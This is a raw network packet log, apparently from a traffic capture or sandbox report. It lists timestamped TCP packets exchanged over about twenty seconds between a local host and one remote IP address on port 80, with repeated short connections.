                                    Aug 25, 2024 15:44:28.206334114 CEST804979480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:28.521579027 CEST804979480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:28.575968027 CEST4979480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:28.720983028 CEST804979480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:28.763510942 CEST4979480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:29.129503965 CEST4979480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:29.130240917 CEST4979580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:29.146997929 CEST804979580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:29.147083998 CEST4979580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:29.147320032 CEST4979580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:29.148298979 CEST804979480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:29.148349047 CEST4979480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:29.153704882 CEST804979580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:29.498047113 CEST4979580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:29.503174067 CEST804979580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:29.503284931 CEST804979580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:29.503294945 CEST804979580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:29.734009981 CEST4979580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:29.734519005 CEST4979680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:29.739382029 CEST804979580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:29.739434958 CEST804979680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:29.739505053 CEST4979580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:29.739521027 CEST4979680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:29.739677906 CEST4979680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:29.744699955 CEST804979680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:29.861303091 CEST4979780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:29.866599083 CEST804979780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:29.866720915 CEST4979780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:29.866861105 CEST4979780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:29.871737957 CEST804979780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:30.091733932 CEST4979680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:30.096765995 CEST804979680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:30.096796989 CEST804979680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:30.216778994 CEST4979780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:30.221904993 CEST804979780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:30.221931934 CEST804979780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:30.222698927 CEST804979780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:30.425194979 CEST804979680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:30.466641903 CEST4979680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:30.562266111 CEST804979680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:30.563822031 CEST804979780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:30.607250929 CEST4979780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:30.607259989 CEST4979680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:30.703711033 CEST804979780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:30.747993946 CEST4979780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:30.823921919 CEST4979680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:30.823993921 CEST4979780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:30.824764013 CEST4979880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:30.829502106 CEST804979680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:30.829577923 CEST4979680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:30.829879999 CEST804979780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:30.829932928 CEST4979780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:30.830501080 CEST804979880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:30.830564976 CEST4979880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:30.830689907 CEST4979880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:30.838182926 CEST804979880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:31.185538054 CEST4979880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:31.194076061 CEST804979880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:31.194092989 CEST804979880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:31.194102049 CEST804979880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:31.527590036 CEST804979880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:31.576040983 CEST4979880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:31.668103933 CEST804979880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:31.674599886 CEST4979880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:31.680013895 CEST804979880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:31.680062056 CEST4979880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:31.792937994 CEST4979980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:31.797923088 CEST804979980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:31.798002005 CEST4979980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:31.798132896 CEST4979980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:31.802944899 CEST804979980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:32.156503916 CEST4979980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:32.161608934 CEST804979980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:32.161624908 CEST804979980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:32.161636114 CEST804979980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:32.472733021 CEST804979980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:32.513560057 CEST4979980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:32.603701115 CEST804979980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:32.654114008 CEST4979980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:32.730840921 CEST4979980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:32.731530905 CEST4980080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:32.736361980 CEST804979980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:32.736421108 CEST4979980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:32.736524105 CEST804980080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:32.736589909 CEST4980080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:32.736696005 CEST4980080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:32.741539955 CEST804980080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:33.091747999 CEST4980080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:33.096859932 CEST804980080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:33.096882105 CEST804980080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:33.096893072 CEST804980080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:33.437525034 CEST804980080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:33.482258081 CEST4980080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:33.573899984 CEST804980080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:33.622885942 CEST4980080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:33.707976103 CEST4980080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:33.708640099 CEST4980180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:33.713289022 CEST804980080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:33.713332891 CEST4980080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:33.713565111 CEST804980180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:33.713618994 CEST4980180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:33.713736057 CEST4980180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:33.718923092 CEST804980180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:34.061054945 CEST4980180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:34.066143990 CEST804980180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:34.066159964 CEST804980180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:34.066169977 CEST804980180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:34.378850937 CEST804980180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:34.419755936 CEST4980180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:34.506130934 CEST804980180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:34.560411930 CEST4980180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:34.619095087 CEST4980180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:34.619776964 CEST4980280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:34.624509096 CEST804980180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:34.624567986 CEST4980180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:34.624613047 CEST804980280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:34.624679089 CEST4980280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:34.624799967 CEST4980280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:34.629754066 CEST804980280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:34.982395887 CEST4980280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:34.987411022 CEST804980280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:34.987427950 CEST804980280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:34.987437963 CEST804980280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:35.290450096 CEST804980280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:35.341639042 CEST4980280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:35.493910074 CEST804980280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:35.544750929 CEST4980280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:35.576837063 CEST4980280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:35.577786922 CEST4980380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:35.582185030 CEST804980280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:35.582248926 CEST4980280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:35.585643053 CEST804980380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:35.585726023 CEST4980380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:35.585855961 CEST4980380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:35.591250896 CEST804980380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:35.618583918 CEST4980380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:35.619216919 CEST4980480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:35.624092102 CEST804980480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:35.624265909 CEST4980480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:35.624265909 CEST4980480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:35.629288912 CEST804980480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:35.667218924 CEST804980380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:35.982466936 CEST4980480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:35.987574100 CEST804980480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:35.987587929 CEST804980480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:35.987596989 CEST804980480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:36.052402973 CEST804980380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:36.052536011 CEST4980380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:36.290426970 CEST804980480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:36.341706038 CEST4980480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:36.418219090 CEST804980480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:36.466660023 CEST4980480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:36.540793896 CEST4980480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:36.541456938 CEST4980580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:36.546339989 CEST804980480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:36.546379089 CEST804980580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:36.546437025 CEST4980480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:36.546485901 CEST4980580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:36.546608925 CEST4980580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:36.551454067 CEST804980580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:36.913373947 CEST4980580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:36.918391943 CEST804980580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:36.918417931 CEST804980580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:36.918474913 CEST804980580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:37.247601986 CEST804980580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:37.294749975 CEST4980580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:37.379519939 CEST804980580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:37.419912100 CEST4980580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:37.501070976 CEST4980580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:37.501898050 CEST4980680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:37.506263971 CEST804980580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:37.506433010 CEST4980580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:37.506737947 CEST804980680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:37.506813049 CEST4980680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:37.506937027 CEST4980680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:37.511718988 CEST804980680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:37.857589960 CEST4980680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:37.862688065 CEST804980680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:37.862704992 CEST804980680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:37.862715960 CEST804980680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:38.172514915 CEST804980680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:38.216635942 CEST4980680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:38.374134064 CEST804980680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:38.419850111 CEST4980680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:38.494867086 CEST4980780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:38.499794006 CEST804980780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:38.505095005 CEST4980780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:38.508047104 CEST4980780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:38.512903929 CEST804980780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:38.857403040 CEST4980780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:38.862474918 CEST804980780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:38.862488985 CEST804980780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:38.862498999 CEST804980780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:39.177469015 CEST804980780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:39.232275009 CEST4980780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:39.378660917 CEST804980780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:39.426500082 CEST4980780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:39.621551991 CEST4980780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:39.622415066 CEST4980880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:39.626754045 CEST804980780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:39.626808882 CEST4980780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:39.627362967 CEST804980880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:39.627425909 CEST4980880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:39.627537966 CEST4980880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:39.632673025 CEST804980880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:39.982346058 CEST4980880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:39.987333059 CEST804980880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:39.987346888 CEST804980880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:39.987356901 CEST804980880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:40.302073002 CEST804980880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:40.357290030 CEST4980880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:40.431818962 CEST804980880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:40.482295990 CEST4980880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:40.647850990 CEST4980880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:40.648262024 CEST4980980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:40.653189898 CEST804980980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:40.653295994 CEST4980980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:40.653474092 CEST4980980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:40.653615952 CEST804980880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:40.653671980 CEST4980880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:40.658334970 CEST804980980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:40.662115097 CEST4981080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:40.667083025 CEST804981080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:40.667170048 CEST4981080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:40.667280912 CEST4981080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:40.672105074 CEST804981080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:40.998276949 CEST4980980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.003243923 CEST804980980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:41.003344059 CEST804980980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:41.013622046 CEST4981080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.018472910 CEST804981080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:41.018486023 CEST804981080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:41.018495083 CEST804981080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:41.350316048 CEST804980980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:41.352663040 CEST804981080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:41.404158115 CEST4980980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.404158115 CEST4981080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.481997967 CEST804981080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:41.497098923 CEST4980980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.502423048 CEST804980980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:41.502522945 CEST4980980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.529144049 CEST4981080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.617657900 CEST4980680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.620826006 CEST4981080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.621606112 CEST4981180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.626166105 CEST804981080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:41.626296997 CEST4981080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.626665115 CEST804981180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:41.626743078 CEST4981180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.626873016 CEST4981180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:41.631639957 CEST804981180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:41.996226072 CEST4981180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:42.001291990 CEST804981180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.001338005 CEST804981180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.001348972 CEST804981180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.298043966 CEST804981180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.341658115 CEST4981180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:42.505667925 CEST804981180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.560412884 CEST4981180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:42.623912096 CEST4981380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:42.629817963 CEST804981380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.629900932 CEST4981380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:42.630007982 CEST4981380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:42.634783983 CEST804981380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.982507944 CEST4981380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:42.987514019 CEST804981380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.987549067 CEST804981380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:42.987560034 CEST804981380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:43.301285028 CEST804981380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:43.357261896 CEST4981380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:43.435637951 CEST804981380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:43.482299089 CEST4981380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:43.557070017 CEST4981380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:43.557727098 CEST4981480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:43.562287092 CEST804981380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:43.562673092 CEST804981480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:43.562789917 CEST4981380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:43.562789917 CEST4981480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:43.562948942 CEST4981480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:43.567768097 CEST804981480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:43.919903040 CEST4981480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:43.925013065 CEST804981480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:43.925029039 CEST804981480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:43.925038099 CEST804981480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:44.248076916 CEST804981480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:44.294847012 CEST4981480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:44.461978912 CEST804981480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:44.513534069 CEST4981480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:44.645565987 CEST4981480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:44.646009922 CEST4981580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:44.651282072 CEST804981480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:44.651300907 CEST804981580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:44.651390076 CEST4981480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:44.651448011 CEST4981580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:44.655134916 CEST4981580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:44.662692070 CEST804981580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.013719082 CEST4981580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.019999027 CEST804981580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.020078897 CEST804981580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.020090103 CEST804981580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.339394093 CEST804981580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.388607979 CEST4981580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.466134071 CEST804981580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.513605118 CEST4981580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.584501028 CEST4981180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.589343071 CEST4981580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.589994907 CEST4981680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.594537020 CEST804981580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.594736099 CEST4981580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.596020937 CEST804981680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.596105099 CEST4981680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.596263885 CEST4981680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.602369070 CEST804981680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.951143026 CEST4981680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:45.957154036 CEST804981680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.957173109 CEST804981680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:45.957182884 CEST804981680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.268445969 CEST804981680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.310411930 CEST4981680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.472846031 CEST804981680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.513567924 CEST4981680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.545533895 CEST4981680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.546442032 CEST4981780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.551074028 CEST804981680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.551156044 CEST4981680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.551338911 CEST804981780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.551435947 CEST4981780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.551513910 CEST4981780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.556288004 CEST804981780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.588419914 CEST4981780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.588855982 CEST4981880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.593655109 CEST804981880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.593738079 CEST4981880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.593861103 CEST4981880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.598617077 CEST804981880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.639098883 CEST804981780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.951167107 CEST4981880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:46.956078053 CEST804981880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.956147909 CEST804981880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:46.956197977 CEST804981880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:47.017774105 CEST804981780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:47.017838001 CEST4981780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:47.261003017 CEST804981880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:47.313158035 CEST4981880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:47.459873915 CEST804981880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:47.513570070 CEST4981880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:47.681714058 CEST4981880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:47.683128119 CEST4981980192.168.2.680.211.144.156
